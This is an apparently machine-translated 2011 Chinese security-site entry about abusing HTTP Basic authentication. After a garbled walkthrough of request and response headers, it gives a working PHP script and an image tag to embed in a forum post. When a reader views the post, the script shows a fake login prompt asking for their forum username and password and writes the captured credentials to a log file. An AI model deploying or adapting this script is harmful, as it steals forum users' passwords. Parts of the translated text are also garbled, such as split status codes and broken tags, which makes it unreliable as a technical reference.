The pictures verify the vulnerability of the social worker use-vulnerability warning-the black bar safety net

2011-06-09T00:00:00
ID MYHACK58:62201130792
Type myhack58
Reporter 佚名
Modified 2011-06-09T00:00:00

Description

Text/meal

HTTP request: GET /iai.php HTTP/1.1 indicates that the request method is GET, the request address, and the HTTP Protocol version Accept: / indicates that the client can identify the content type of list,/represent all types Accept-Language: zh-cn indicates that the client can understand the disc language: Simplified Chinese Accept-Encoding: gzip, deflate indicates that the client can understand the type of the disc

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; . NET CLR 1.1.4322; . NET CLR 2.0.50727; . NET CLR 3.0.04506.648; . NET CLR 3.5.21022) indicates that the client browser type Host: www.test.cn represents the submit a Request page Connection: Keep-Alive represents the TCP connection remains open

HTTP response:

HTTP/1.1 4 0 1 Unauthorized represents the HTTP Protocol version 4, 0 1 i.e., unauthorized Access Date: Sat, 2 5 Jul 2 0 0 9 1 1:4 2:2 7 GMT represents the current GMT time Server: Apache/2.2.3 (CentOS) represents the operation of the server type X-Powered-By: PHP/5.1.6 indicates that the server script WWW-Authenticate: Basic realm="Text" represents the client in the Authenticate header is provided The authorization information Content-Length: 3 indicates that the connection Content Length Connection: close represents the TCP connection is closed Content-Type: text/html representation of the document type

负责 响应 的 iai.php file contents: header('WWW-Authenticate: Basic realm="Text"'); header('HTTP/1.0 4 0 1 Unauthorized'); Use the PHP Header()function sends a raw HTTP-header[Http Header]to the client End.

<img src="http://www.aaaa.com/iai.php"></img>

<? php

global $username,$passwd,$host; if(! isset($_SERVER['PHP_AUTH_USER'])){

header('WWW-Authenticate:Basic realm="please enter your forum user name and password"'); header('HTTP/1.0 4 0 1 Unauthorized'); exit; } $usname=$_SERVER['PHP_AUTH_USER']; $passwd=$_SERVER['PHP_AUTH_PW']; $host=$_SERVER['HTTP_HOST']; $myFile="log.txt"; $fh=fopen($myFile,'a') or die("can't open file"); fwrite($fh,"URL:\t$host\t\t"); fwrite($fh,"usname:\t$usname\t"); fwrite($fh,"passwd:\t$passwd\r\n"); fclose($fh);

?& gt;